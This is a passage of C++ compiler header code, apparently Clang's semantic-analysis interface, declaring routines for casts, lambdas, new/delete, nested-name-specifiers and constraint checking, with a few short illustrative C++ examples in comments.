void DefineImplicitCopyAssignment(SourceLocation CurrentLocation,
CXXMethodDecl *MethodDecl);
/// Declare the implicit move assignment operator for the given class.
///
/// \param ClassDecl The Class declaration into which the implicit
/// move assignment operator will be added.
///
/// \returns The implicitly-declared move assignment operator, or NULL if it
/// wasn't declared.
CXXMethodDecl *DeclareImplicitMoveAssignment(CXXRecordDecl *ClassDecl);
/// Defines an implicitly-declared move assignment operator.
void DefineImplicitMoveAssignment(SourceLocation CurrentLocation,
CXXMethodDecl *MethodDecl);
/// Force the declaration of any implicitly-declared members of this
/// class.
void ForceDeclarationOfImplicitMembers(CXXRecordDecl *Class);
/// Check a completed declaration of an implicit special member.
void CheckImplicitSpecialMemberDeclaration(Scope *S, FunctionDecl *FD);
/// Determine whether the given function is an implicitly-deleted
/// special member function.
bool isImplicitlyDeleted(FunctionDecl *FD);
/// Check whether 'this' shows up in the type of a static member
/// function after the (naturally empty) cv-qualifier-seq would be.
///
/// \returns true if an error occurred.
bool checkThisInStaticMemberFunctionType(CXXMethodDecl *Method);
/// Check whether 'this' shows up in the exception specification of a static
/// member function.
bool checkThisInStaticMemberFunctionExceptionSpec(CXXMethodDecl *Method);
/// Check whether 'this' shows up in the attributes of the given
/// static member function.
///
/// \returns true if an error occurred.
bool checkThisInStaticMemberFunctionAttributes(CXXMethodDecl *Method);
/// MaybeBindToTemporary - If the passed in expression has a record type with
/// a non-trivial destructor, this will return a CXXBindTemporaryExpr. Otherwise
/// it simply returns the passed in expression.
ExprResult MaybeBindToTemporary(Expr *E);
bool CompleteConstructorCall(CXXConstructorDecl *Constructor,
MultiExprArg ArgsPtr,
SourceLocation Loc,
SmallVectorImpl<Expr*> &ConvertedArgs,
bool AllowExplicit = false,
bool IsListInitialization = false);
ParsedType getInheritingConstructorName(CXXScopeSpec &SS,
SourceLocation NameLoc,
IdentifierInfo &Name);
ParsedType getConstructorName(IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec &SS,
bool EnteringContext);
ParsedType getDestructorName(SourceLocation TildeLoc,
IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec &SS,
ParsedType ObjectType,
bool EnteringContext);
ParsedType getDestructorTypeForDecltype(const DeclSpec &DS,
ParsedType ObjectType);
// Checks that reinterpret casts don't have undefined behavior.
void CheckCompatibleReinterpretCast(QualType SrcType, QualType DestType,
bool IsDereference, SourceRange Range);
/// ActOnCXXNamedCast - Parse {dynamic,static,reinterpret,const}_cast's.
ExprResult ActOnCXXNamedCast(SourceLocation OpLoc,
tok::TokenKind Kind,
SourceLocation LAngleBracketLoc,
Declarator &D,
SourceLocation RAngleBracketLoc,
SourceLocation LParenLoc,
Expr *E,
SourceLocation RParenLoc);
ExprResult BuildCXXNamedCast(SourceLocation OpLoc,
tok::TokenKind Kind,
TypeSourceInfo *Ty,
Expr *E,
SourceRange AngleBrackets,
SourceRange Parens);
ExprResult ActOnBuiltinBitCastExpr(SourceLocation KWLoc, Declarator &Dcl,
ExprResult Operand,
SourceLocation RParenLoc);
ExprResult BuildBuiltinBitCastExpr(SourceLocation KWLoc, TypeSourceInfo *TSI,
Expr *Operand, SourceLocation RParenLoc);
ExprResult BuildCXXTypeId(QualType TypeInfoType,
SourceLocation TypeidLoc,
TypeSourceInfo *Operand,
SourceLocation RParenLoc);
ExprResult BuildCXXTypeId(QualType TypeInfoType,
SourceLocation TypeidLoc,
Expr *Operand,
SourceLocation RParenLoc);
/// ActOnCXXTypeid - Parse typeid( something ).
ExprResult ActOnCXXTypeid(SourceLocation OpLoc,
SourceLocation LParenLoc, bool isType,
void *TyOrExpr,
SourceLocation RParenLoc);
ExprResult BuildCXXUuidof(QualType TypeInfoType,
SourceLocation TypeidLoc,
TypeSourceInfo *Operand,
SourceLocation RParenLoc);
ExprResult BuildCXXUuidof(QualType TypeInfoType,
SourceLocation TypeidLoc,
Expr *Operand,
SourceLocation RParenLoc);
/// ActOnCXXUuidof - Parse __uuidof( something ).
ExprResult ActOnCXXUuidof(SourceLocation OpLoc,
SourceLocation LParenLoc, bool isType,
void *TyOrExpr,
SourceLocation RParenLoc);
/// Handle a C++1z fold-expression: ( expr op ... op expr ).
ExprResult ActOnCXXFoldExpr(SourceLocation LParenLoc, Expr *LHS,
tok::TokenKind Operator,
SourceLocation EllipsisLoc, Expr *RHS,
SourceLocation RParenLoc);
ExprResult BuildCXXFoldExpr(SourceLocation LParenLoc, Expr *LHS,
BinaryOperatorKind Operator,
SourceLocation EllipsisLoc, Expr *RHS,
SourceLocation RParenLoc,
Optional<unsigned> NumExpansions);
ExprResult BuildEmptyCXXFoldExpr(SourceLocation EllipsisLoc,
BinaryOperatorKind Operator);
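// Illustrative sketch (not part of this interface): a binary right fold; the
// '+ 0' initializer makes the empty pack well-formed, whereas a unary fold
// '(ts + ...)' over an empty pack would be rejected (only '&&', '||' and ','
// have an empty-pack value, cf. BuildEmptyCXXFoldExpr):
//
//   template <typename... Ts>
//   constexpr auto sum(Ts... ts) { return (ts + ... + 0); }
//   static_assert(sum(1, 2, 3) == 6);
//   static_assert(sum() == 0);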
/// ActOnCXXThis - Parse 'this' pointer.
ExprResult ActOnCXXThis(SourceLocation loc);
/// Build a CXXThisExpr and mark it referenced in the current context.
Expr *BuildCXXThisExpr(SourceLocation Loc, QualType Type, bool IsImplicit);
void MarkThisReferenced(CXXThisExpr *This);
/// Try to retrieve the type of the 'this' pointer.
///
/// \returns The type of 'this', if possible. Otherwise, returns a NULL type.
QualType getCurrentThisType();
/// When non-NULL, the C++ 'this' expression is allowed despite the
/// current context not being a non-static member function. In such cases,
/// this provides the type used for 'this'.
QualType CXXThisTypeOverride;
/// RAII object used to temporarily allow the C++ 'this' expression
/// to be used, with the given qualifiers on the current class type.
class CXXThisScopeRAII {
Sema &S;
QualType OldCXXThisTypeOverride;
bool Enabled;
public:
/// Introduce a new scope where 'this' may be allowed (when enabled),
/// using the given declaration (which is either a class template or a
/// class) along with the qualifiers placed on '*this'.
CXXThisScopeRAII(Sema &S, Decl *ContextDecl, Qualifiers CXXThisTypeQuals,
bool Enabled = true);
~CXXThisScopeRAII();
};
/// Make sure the value of 'this' is actually available in the current
/// context, if it is a potentially evaluated context.
///
/// \param Loc The location at which the capture of 'this' occurs.
///
/// \param Explicit Whether 'this' is explicitly captured in a lambda
/// capture list.
///
/// \param FunctionScopeIndexToStopAt If non-null, it points to the index
/// of the FunctionScopeInfo stack beyond which we do not attempt to capture.
/// This is useful when enclosing lambdas must speculatively capture
/// 'this' that may or may not be used in certain specializations of
/// a nested generic lambda (depending on whether the name resolves to
/// a non-static member function or a static function).
/// \returns true if the capture failed, false on success.
bool CheckCXXThisCapture(SourceLocation Loc, bool Explicit = false,
bool BuildAndDiagnose = true,
const unsigned *const FunctionScopeIndexToStopAt = nullptr,
bool ByCopy = false);
/// Determine whether the given type is the type of *this that is used
/// outside of the body of a member function for a type that is currently
/// being defined.
bool isThisOutsideMemberFunctionBody(QualType BaseType);
/// ActOnCXXBoolLiteral - Parse {true,false} literals.
ExprResult ActOnCXXBoolLiteral(SourceLocation OpLoc, tok::TokenKind Kind);
/// ActOnObjCBoolLiteral - Parse {__objc_yes,__objc_no} literals.
ExprResult ActOnObjCBoolLiteral(SourceLocation OpLoc, tok::TokenKind Kind);
ExprResult
ActOnObjCAvailabilityCheckExpr(llvm::ArrayRef<AvailabilitySpec> AvailSpecs,
SourceLocation AtLoc, SourceLocation RParen);
/// ActOnCXXNullPtrLiteral - Parse 'nullptr'.
ExprResult ActOnCXXNullPtrLiteral(SourceLocation Loc);
/// ActOnCXXThrow - Parse throw expressions.
ExprResult ActOnCXXThrow(Scope *S, SourceLocation OpLoc, Expr *expr);
ExprResult BuildCXXThrow(SourceLocation OpLoc, Expr *Ex,
bool IsThrownVarInScope);
bool CheckCXXThrowOperand(SourceLocation ThrowLoc, QualType ThrowTy, Expr *E);
/// ActOnCXXTypeConstructExpr - Parse construction of a specified type.
/// Can be interpreted either as function-style casting ("int(x)")
/// or class type construction ("ClassType(x,y,z)")
/// or creation of a value-initialized type ("int()").
ExprResult ActOnCXXTypeConstructExpr(ParsedType TypeRep,
SourceLocation LParenOrBraceLoc,
MultiExprArg Exprs,
SourceLocation RParenOrBraceLoc,
bool ListInitialization);
ExprResult BuildCXXTypeConstructExpr(TypeSourceInfo *Type,
SourceLocation LParenLoc,
MultiExprArg Exprs,
SourceLocation RParenLoc,
bool ListInitialization);
/// ActOnCXXNew - Parsed a C++ 'new' expression.
ExprResult ActOnCXXNew(SourceLocation StartLoc, bool UseGlobal,
SourceLocation PlacementLParen,
MultiExprArg PlacementArgs,
SourceLocation PlacementRParen,
SourceRange TypeIdParens, Declarator &D,
Expr *Initializer);
ExprResult BuildCXXNew(SourceRange Range, bool UseGlobal,
SourceLocation PlacementLParen,
MultiExprArg PlacementArgs,
SourceLocation PlacementRParen,
SourceRange TypeIdParens,
QualType AllocType,
TypeSourceInfo *AllocTypeInfo,
Optional<Expr *> ArraySize,
SourceRange DirectInitRange,
Expr *Initializer);
/// Determine whether \p FD is an aligned allocation or deallocation
/// function that is unavailable.
bool isUnavailableAlignedAllocationFunction(const FunctionDecl &FD) const;
/// Produce diagnostics if \p FD is an aligned allocation or deallocation
/// function that is unavailable.
void diagnoseUnavailableAlignedAllocation(const FunctionDecl &FD,
SourceLocation Loc);
bool CheckAllocatedType(QualType AllocType, SourceLocation Loc,
SourceRange R);
/// The scope in which to find allocation functions.
enum AllocationFunctionScope {
/// Only look for allocation functions in the global scope.
AFS_Global,
/// Only look for allocation functions in the scope of the
/// allocated class.
AFS_Class,
/// Look for allocation functions in both the global scope
/// and in the scope of the allocated class.
AFS_Both
};
/// Finds the overloads of operator new and delete that are appropriate
/// for the allocation.
bool FindAllocationFunctions(SourceLocation StartLoc, SourceRange Range,
AllocationFunctionScope NewScope,
AllocationFunctionScope DeleteScope,
QualType AllocType, bool IsArray,
bool &PassAlignment, MultiExprArg PlaceArgs,
FunctionDecl *&OperatorNew,
FunctionDecl *&OperatorDelete,
bool Diagnose = true);
void DeclareGlobalNewDelete();
void DeclareGlobalAllocationFunction(DeclarationName Name, QualType Return,
ArrayRef<QualType> Params);
bool FindDeallocationFunction(SourceLocation StartLoc, CXXRecordDecl *RD,
DeclarationName Name, FunctionDecl* &Operator,
bool Diagnose = true);
FunctionDecl *FindUsualDeallocationFunction(SourceLocation StartLoc,
bool CanProvideSize,
bool Overaligned,
DeclarationName Name);
FunctionDecl *FindDeallocationFunctionForDestructor(SourceLocation StartLoc,
CXXRecordDecl *RD);
/// ActOnCXXDelete - Parsed a C++ 'delete' expression.
ExprResult ActOnCXXDelete(SourceLocation StartLoc,
bool UseGlobal, bool ArrayForm,
Expr *Operand);
void CheckVirtualDtorCall(CXXDestructorDecl *dtor, SourceLocation Loc,
bool IsDelete, bool CallCanBeVirtual,
bool WarnOnNonAbstractTypes,
SourceLocation DtorLoc);
ExprResult ActOnNoexceptExpr(SourceLocation KeyLoc, SourceLocation LParen,
Expr *Operand, SourceLocation RParen);
ExprResult BuildCXXNoexceptExpr(SourceLocation KeyLoc, Expr *Operand,
SourceLocation RParen);
/// Parsed one of the type trait support pseudo-functions.
ExprResult ActOnTypeTrait(TypeTrait Kind, SourceLocation KWLoc,
ArrayRef<ParsedType> Args,
SourceLocation RParenLoc);
ExprResult BuildTypeTrait(TypeTrait Kind, SourceLocation KWLoc,
ArrayRef<TypeSourceInfo *> Args,
SourceLocation RParenLoc);
/// ActOnArrayTypeTrait - Parsed one of the binary type trait support
/// pseudo-functions.
ExprResult ActOnArrayTypeTrait(ArrayTypeTrait ATT,
SourceLocation KWLoc,
ParsedType LhsTy,
Expr *DimExpr,
SourceLocation RParen);
ExprResult BuildArrayTypeTrait(ArrayTypeTrait ATT,
SourceLocation KWLoc,
TypeSourceInfo *TSInfo,
Expr *DimExpr,
SourceLocation RParen);
/// ActOnExpressionTrait - Parsed one of the unary type trait support
/// pseudo-functions.
ExprResult ActOnExpressionTrait(ExpressionTrait OET,
SourceLocation KWLoc,
Expr *Queried,
SourceLocation RParen);
ExprResult BuildExpressionTrait(ExpressionTrait OET,
SourceLocation KWLoc,
Expr *Queried,
SourceLocation RParen);
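// Illustrative sketch (not part of this interface), assuming Clang's builtin
// type-trait pseudo-functions (__array_rank/__array_extent are the
// Embarcadero-style array traits handled by ActOnArrayTypeTrait):
//
//   static_assert(__is_same(int, int), "");
//   static_assert(__array_rank(int[2][3]) == 2, "");
//   static_assert(__array_extent(int[2][3], 1) == 3, "");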
ExprResult ActOnStartCXXMemberReference(Scope *S,
Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
ParsedType &ObjectType,
bool &MayBePseudoDestructor);
ExprResult BuildPseudoDestructorExpr(Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
const CXXScopeSpec &SS,
TypeSourceInfo *ScopeType,
SourceLocation CCLoc,
SourceLocation TildeLoc,
PseudoDestructorTypeStorage DestroyedType);
ExprResult ActOnPseudoDestructorExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
UnqualifiedId &FirstTypeName,
SourceLocation CCLoc,
SourceLocation TildeLoc,
UnqualifiedId &SecondTypeName);
ExprResult ActOnPseudoDestructorExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
SourceLocation TildeLoc,
const DeclSpec& DS);
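// Illustrative sketch (not part of this interface): for a scalar type the
// '->~T()' below is a pseudo-destructor call; it has no effect, but keeps
// generic code well-formed for class and non-class types alike:
//
//   template <typename T> void destroy(T *p) { p->~T(); }
//   void use(int *p) { destroy(p); }  // OK: int has no real destructor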
/// MaybeCreateExprWithCleanups - If the current full-expression
/// requires any cleanups, surround it with an ExprWithCleanups node.
/// Otherwise, just returns the passed-in expression.
Expr *MaybeCreateExprWithCleanups(Expr *SubExpr);
Stmt *MaybeCreateStmtWithCleanups(Stmt *SubStmt);
ExprResult MaybeCreateExprWithCleanups(ExprResult SubExpr);
MaterializeTemporaryExpr *
CreateMaterializeTemporaryExpr(QualType T, Expr *Temporary,
bool BoundToLvalueReference);
ExprResult ActOnFinishFullExpr(Expr *Expr, bool DiscardedValue) {
return ActOnFinishFullExpr(
Expr, Expr ? Expr->getExprLoc() : SourceLocation(), DiscardedValue);
}
ExprResult ActOnFinishFullExpr(Expr *Expr, SourceLocation CC,
bool DiscardedValue, bool IsConstexpr = false);
StmtResult ActOnFinishFullStmt(Stmt *Stmt);
// Marks SS invalid if it represents an incomplete type.
bool RequireCompleteDeclContext(CXXScopeSpec &SS, DeclContext *DC);
DeclContext *computeDeclContext(QualType T);
DeclContext *computeDeclContext(const CXXScopeSpec &SS,
bool EnteringContext = false);
bool isDependentScopeSpecifier(const CXXScopeSpec &SS);
CXXRecordDecl *getCurrentInstantiationOf(NestedNameSpecifier *NNS);
/// The parser has parsed a global nested-name-specifier '::'.
///
/// \param CCLoc The location of the '::'.
///
/// \param SS The nested-name-specifier, which will be updated in-place
/// to reflect the parsed nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXGlobalScopeSpecifier(SourceLocation CCLoc, CXXScopeSpec &SS);
/// The parser has parsed a '__super' nested-name-specifier.
///
/// \param SuperLoc The location of the '__super' keyword.
///
/// \param ColonColonLoc The location of the '::'.
///
/// \param SS The nested-name-specifier, which will be updated in-place
/// to reflect the parsed nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnSuperScopeSpecifier(SourceLocation SuperLoc,
SourceLocation ColonColonLoc, CXXScopeSpec &SS);
bool isAcceptableNestedNameSpecifier(const NamedDecl *SD,
bool *CanCorrect = nullptr);
NamedDecl *FindFirstQualifierInScope(Scope *S, NestedNameSpecifier *NNS);
/// Keeps information about an identifier in a nested-name-spec.
///
struct NestedNameSpecInfo {
/// The type of the object, if we're parsing nested-name-specifier in
/// a member access expression.
ParsedType ObjectType;
/// The identifier preceding the '::'.
IdentifierInfo *Identifier;
/// The location of the identifier.
SourceLocation IdentifierLoc;
/// The location of the '::'.
SourceLocation CCLoc;
/// Creates info object for the most typical case.
NestedNameSpecInfo(IdentifierInfo *II, SourceLocation IdLoc,
SourceLocation ColonColonLoc, ParsedType ObjectType = ParsedType())
: ObjectType(ObjectType), Identifier(II), IdentifierLoc(IdLoc),
CCLoc(ColonColonLoc) {
}
NestedNameSpecInfo(IdentifierInfo *II, SourceLocation IdLoc,
SourceLocation ColonColonLoc, QualType ObjectType)
: ObjectType(ParsedType::make(ObjectType)), Identifier(II),
IdentifierLoc(IdLoc), CCLoc(ColonColonLoc) {
}
};
bool isNonTypeNestedNameSpecifier(Scope *S, CXXScopeSpec &SS,
NestedNameSpecInfo &IdInfo);
bool BuildCXXNestedNameSpecifier(Scope *S,
NestedNameSpecInfo &IdInfo,
bool EnteringContext,
CXXScopeSpec &SS,
NamedDecl *ScopeLookupResult,
bool ErrorRecoveryLookup,
bool *IsCorrectedToColon = nullptr,
bool OnlyNamespace = false);
/// The parser has parsed a nested-name-specifier 'identifier::'.
///
/// \param S The scope in which this nested-name-specifier occurs.
///
/// \param IdInfo Parser information about an identifier in the
/// nested-name-spec.
///
/// \param EnteringContext Whether we're entering the context nominated by
/// this nested-name-specifier.
///
/// \param SS The nested-name-specifier, which is both an input
/// parameter (the nested-name-specifier before this type) and an
/// output parameter (containing the full nested-name-specifier,
/// including this new type).
///
/// \param ErrorRecoveryLookup If true, then this method is called to improve
/// error recovery. In this case, do not emit error messages.
///
/// \param IsCorrectedToColon If not null, suggestions to replace '::' -> ':'
/// are allowed. The bool value pointed to by this parameter is set to 'true'
/// if the identifier is treated as if it was followed by ':', not '::'.
///
/// \param OnlyNamespace If true, only considers namespaces in lookup.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXNestedNameSpecifier(Scope *S,
NestedNameSpecInfo &IdInfo,
bool EnteringContext,
CXXScopeSpec &SS,
bool ErrorRecoveryLookup = false,
bool *IsCorrectedToColon = nullptr,
bool OnlyNamespace = false);
ExprResult ActOnDecltypeExpression(Expr *E);
bool ActOnCXXNestedNameSpecifierDecltype(CXXScopeSpec &SS,
const DeclSpec &DS,
SourceLocation ColonColonLoc);
bool IsInvalidUnlessNestedName(Scope *S, CXXScopeSpec &SS,
NestedNameSpecInfo &IdInfo,
bool EnteringContext);
/// The parser has parsed a nested-name-specifier
/// 'template[opt] template-name < template-args >::'.
///
/// \param S The scope in which this nested-name-specifier occurs.
///
/// \param SS The nested-name-specifier, which is both an input
/// parameter (the nested-name-specifier before this type) and an
/// output parameter (containing the full nested-name-specifier,
/// including this new type).
///
/// \param TemplateKWLoc the location of the 'template' keyword, if any.
/// \param TemplateName the template name.
/// \param TemplateNameLoc The location of the template name.
/// \param LAngleLoc The location of the opening angle bracket ('<').
/// \param TemplateArgs The template arguments.
/// \param RAngleLoc The location of the closing angle bracket ('>').
/// \param CCLoc The location of the '::'.
///
/// \param EnteringContext Whether we're entering the context of the
/// nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXNestedNameSpecifier(Scope *S,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
TemplateTy TemplateName,
SourceLocation TemplateNameLoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc,
SourceLocation CCLoc,
bool EnteringContext);
/// Given a C++ nested-name-specifier, produce an annotation value
/// that the parser can use later to reconstruct the given
/// nested-name-specifier.
///
/// \param SS A nested-name-specifier.
///
/// \returns A pointer containing all of the information in the
/// nested-name-specifier \p SS.
void *SaveNestedNameSpecifierAnnotation(CXXScopeSpec &SS);
/// Given an annotation pointer for a nested-name-specifier, restore
/// the nested-name-specifier structure.
///
/// \param Annotation The annotation pointer, produced by
/// \c SaveNestedNameSpecifierAnnotation().
///
/// \param AnnotationRange The source range corresponding to the annotation.
///
/// \param SS The nested-name-specifier that will be updated with the contents
/// of the annotation pointer.
void RestoreNestedNameSpecifierAnnotation(void *Annotation,
SourceRange AnnotationRange,
CXXScopeSpec &SS);
bool ShouldEnterDeclaratorScope(Scope *S, const CXXScopeSpec &SS);
/// ActOnCXXEnterDeclaratorScope - Called when a C++ scope specifier (global
/// scope or nested-name-specifier) is parsed, part of a declarator-id.
/// After this method is called, according to [C++ 3.4.3p3], names should be
/// looked up in the declarator-id's scope, until the declarator is parsed and
/// ActOnCXXExitDeclaratorScope is called.
/// The 'SS' should be a non-empty valid CXXScopeSpec.
bool ActOnCXXEnterDeclaratorScope(Scope *S, CXXScopeSpec &SS);
/// ActOnCXXExitDeclaratorScope - Called when a declarator that previously
/// invoked ActOnCXXEnterDeclaratorScope(), is finished. 'SS' is the same
/// CXXScopeSpec that was passed to ActOnCXXEnterDeclaratorScope as well.
/// Used to indicate that names should revert to being looked up in the
/// defining scope.
void ActOnCXXExitDeclaratorScope(Scope *S, const CXXScopeSpec &SS);
/// ActOnCXXEnterDeclInitializer - Invoked when we are about to parse an
/// initializer for the declaration 'Dcl'.
/// After this method is called, according to [C++ 3.4.1p13], if 'Dcl' is a
/// static data member of class X, names should be looked up in the scope of
/// class X.
void ActOnCXXEnterDeclInitializer(Scope *S, Decl *Dcl);
/// ActOnCXXExitDeclInitializer - Invoked after we are finished parsing an
/// initializer for the declaration 'Dcl'.
void ActOnCXXExitDeclInitializer(Scope *S, Decl *Dcl);
/// Create a new lambda closure type.
CXXRecordDecl *createLambdaClosureType(SourceRange IntroducerRange,
TypeSourceInfo *Info,
bool KnownDependent,
LambdaCaptureDefault CaptureDefault);
/// Start the definition of a lambda expression.
CXXMethodDecl *startLambdaDefinition(CXXRecordDecl *Class,
SourceRange IntroducerRange,
TypeSourceInfo *MethodType,
SourceLocation EndLoc,
ArrayRef<ParmVarDecl *> Params,
ConstexprSpecKind ConstexprKind);
/// Number lambda for linkage purposes if necessary.
void handleLambdaNumbering(
CXXRecordDecl *Class, CXXMethodDecl *Method,
Optional<std::tuple<unsigned, bool, Decl *>> Mangling = None);
/// Endow the lambda scope info with the relevant properties.
void buildLambdaScope(sema::LambdaScopeInfo *LSI,
CXXMethodDecl *CallOperator,
SourceRange IntroducerRange,
LambdaCaptureDefault CaptureDefault,
SourceLocation CaptureDefaultLoc,
bool ExplicitParams,
bool ExplicitResultType,
bool Mutable);
/// Perform initialization analysis of the init-capture and perform
/// any implicit conversions such as an lvalue-to-rvalue conversion if
/// not being used to initialize a reference.
ParsedType actOnLambdaInitCaptureInitialization(
SourceLocation Loc, bool ByRef, SourceLocation EllipsisLoc,
IdentifierInfo *Id, LambdaCaptureInitKind InitKind, Expr *&Init) {
return ParsedType::make(buildLambdaInitCaptureInitialization(
Loc, ByRef, EllipsisLoc, None, Id,
InitKind != LambdaCaptureInitKind::CopyInit, Init));
}
QualType buildLambdaInitCaptureInitialization(
SourceLocation Loc, bool ByRef, SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions, IdentifierInfo *Id, bool DirectInit,
Expr *&Init);
/// Create a dummy variable within the DeclContext of the lambda's
/// call operator, for name lookup purposes for a lambda init capture.
///
/// CodeGen handles emission of lambda captures, ignoring these dummy
/// variables appropriately.
VarDecl *createLambdaInitCaptureVarDecl(SourceLocation Loc,
QualType InitCaptureType,
SourceLocation EllipsisLoc,
IdentifierInfo *Id,
unsigned InitStyle, Expr *Init);
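// Illustrative sketch (not part of this interface): the init-capture 'q'
// below is the name that the dummy VarDecl above represents during name
// lookup in the lambda body:
//
//   #include <memory>
//   int use() {
//     auto p = std::make_unique<int>(42);
//     auto own = [q = std::move(p)] { return *q; };
//     return own();  // 42
//   }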
/// Add an init-capture to a lambda scope.
void addInitCapture(sema::LambdaScopeInfo *LSI, VarDecl *Var);
/// Note that we have finished the explicit captures for the
/// given lambda.
void finishLambdaExplicitCaptures(sema::LambdaScopeInfo *LSI);
/// \brief This is called after parsing the explicit template parameter list
/// on a lambda (if it exists) in C++2a.
void ActOnLambdaExplicitTemplateParameterList(SourceLocation LAngleLoc,
ArrayRef<NamedDecl *> TParams,
SourceLocation RAngleLoc);
/// Introduce the lambda parameters into scope.
void addLambdaParameters(
ArrayRef<LambdaIntroducer::LambdaCapture> Captures,
CXXMethodDecl *CallOperator, Scope *CurScope);
/// Deduce a block or lambda's return type based on the return
/// statements present in the body.
void deduceClosureReturnType(sema::CapturingScopeInfo &CSI);
/// ActOnStartOfLambdaDefinition - This is called just before we start
/// parsing the body of a lambda; it analyzes the explicit captures and
/// arguments, and sets up various data-structures for the body of the
/// lambda.
void ActOnStartOfLambdaDefinition(LambdaIntroducer &Intro,
Declarator &ParamInfo, Scope *CurScope);
/// ActOnLambdaError - If there is an error parsing a lambda, this callback
/// is invoked to pop the information about the lambda.
void ActOnLambdaError(SourceLocation StartLoc, Scope *CurScope,
bool IsInstantiation = false);
/// ActOnLambdaExpr - This is called when the body of a lambda expression
/// was successfully completed.
ExprResult ActOnLambdaExpr(SourceLocation StartLoc, Stmt *Body,
Scope *CurScope);
/// Does copying/destroying the captured variable have side effects?
bool CaptureHasSideEffects(const sema::Capture &From);
/// Diagnose if an explicit lambda capture is unused. Returns true if a
/// diagnostic is emitted.
bool DiagnoseUnusedLambdaCapture(SourceRange CaptureRange,
const sema::Capture &From);
/// Build a FieldDecl suitable to hold the given capture.
FieldDecl *BuildCaptureField(RecordDecl *RD, const sema::Capture &Capture);
/// Initialize the given capture with a suitable expression.
ExprResult BuildCaptureInit(const sema::Capture &Capture,
SourceLocation ImplicitCaptureLoc,
bool IsOpenMPMapping = false);
/// Complete a lambda-expression having processed and attached the
/// lambda body.
ExprResult BuildLambdaExpr(SourceLocation StartLoc, SourceLocation EndLoc,
sema::LambdaScopeInfo *LSI);
/// Get the return type to use for a lambda's conversion function(s) to
/// function pointer type, given the type of the call operator.
QualType
getLambdaConversionFunctionResultType(const FunctionProtoType *CallOpType);
/// Define the "body" of the conversion from a lambda object to a
/// function pointer.
///
/// This routine doesn't actually define a sensible body; rather, it fills
/// in the initialization expression needed to copy the lambda object into
/// the block, and IR generation actually generates the real body of the
/// block pointer conversion.
void DefineImplicitLambdaToFunctionPointerConversion(
SourceLocation CurrentLoc, CXXConversionDecl *Conv);
/// Define the "body" of the conversion from a lambda object to a
/// block pointer.
///
/// This routine doesn't actually define a sensible body; rather, it fills
/// in the initialization expression needed to copy the lambda object into
/// the block, and IR generation actually generates the real body of the
/// block pointer conversion.
void DefineImplicitLambdaToBlockPointerConversion(SourceLocation CurrentLoc,
CXXConversionDecl *Conv);
ExprResult BuildBlockForLambdaConversion(SourceLocation CurrentLocation,
SourceLocation ConvLocation,
CXXConversionDecl *Conv,
Expr *Src);
/// Check whether the given expression is a valid constraint expression.
/// A diagnostic is emitted if it is not, and false is returned.
bool CheckConstraintExpression(Expr *CE);
private:
/// \brief Caches pairs of template-like decls whose associated constraints
/// were checked for subsumption and whether or not the first's constraints
/// did in fact subsume the second's.
llvm::DenseMap<std::pair<NamedDecl *, NamedDecl *>, bool> SubsumptionCache;
public:
/// \brief Check whether the given declaration's associated constraints are
/// at least as constrained as another declaration's, according to the
/// partial ordering of constraints.
///
/// \param Result If no error occurred, receives the result: true if D1 is
/// at least as constrained as D2, and false otherwise.
///
/// \returns true if an error occurred, false otherwise.
bool IsAtLeastAsConstrained(NamedDecl *D1, ArrayRef<const Expr *> AC1,
NamedDecl *D2, ArrayRef<const Expr *> AC2,
bool &Result);
/// \brief Check whether the given list of constraint expressions are
/// satisfied (as if in a 'conjunction') given template arguments.
/// \param ConstraintExprs a list of constraint expressions, treated as if
/// they were 'AND'ed together.
/// \param TemplateArgs the list of template arguments to substitute into the
/// constraint expression.
/// \param TemplateIDRange The source range of the template id that
/// caused the constraints check.
/// \param Satisfaction if true is returned, will contain details of the
/// satisfaction, with enough information to diagnose an unsatisfied
/// expression.
/// \returns true if an error occurred and satisfaction could not be checked,
/// false otherwise.
bool CheckConstraintSatisfaction(TemplateDecl *Template,
ArrayRef<const Expr *> ConstraintExprs,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange,
ConstraintSatisfaction &Satisfaction);
bool CheckConstraintSatisfaction(ClassTemplatePartialSpecializationDecl *TD,
ArrayRef<const Expr *> ConstraintExprs,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange,
ConstraintSatisfaction &Satisfaction);
bool CheckConstraintSatisfaction(VarTemplatePartialSpecializationDecl *TD,
ArrayRef<const Expr *> ConstraintExprs,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange,
ConstraintSatisfaction &Satisfaction);
/// \brief Check whether the given non-dependent constraint expression is
/// satisfied. Returns false and updates Satisfaction with the satisfaction
/// verdict if successful; emits a diagnostic and returns true if an error
/// occurred and satisfaction could not be determined.
///
/// \returns true if an error occurred, false otherwise.
bool CheckConstraintSatisfaction(const Expr *ConstraintExpr,
ConstraintSatisfaction &Satisfaction);
/// Check that the associated constraints of a template declaration match the
/// associated constraints of an older declaration of which it is a
/// redeclaration.
bool CheckRedeclarationConstraintMatch(TemplateParameterList *Old,
TemplateParameterList *New);
/// \brief Ensure that the given template arguments satisfy the constraints
/// associated with the given template, emitting a diagnostic if they do not.
///
/// \param Template The template to which the template arguments are being
/// provided.
///
/// \param TemplateArgs The converted, canonicalized template arguments.
///
/// \param TemplateIDRange The source range of the template id that
/// caused the constraints check.
///
/// \returns true if the constraints are not satisfied or could not be checked
/// for satisfaction, false if the constraints are satisfied.
bool EnsureTemplateArgumentListConstraints(TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange);
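// Illustrative sketch (not part of this interface): a constraint expression
// and its use; when the constraint is unsatisfied, overload resolution
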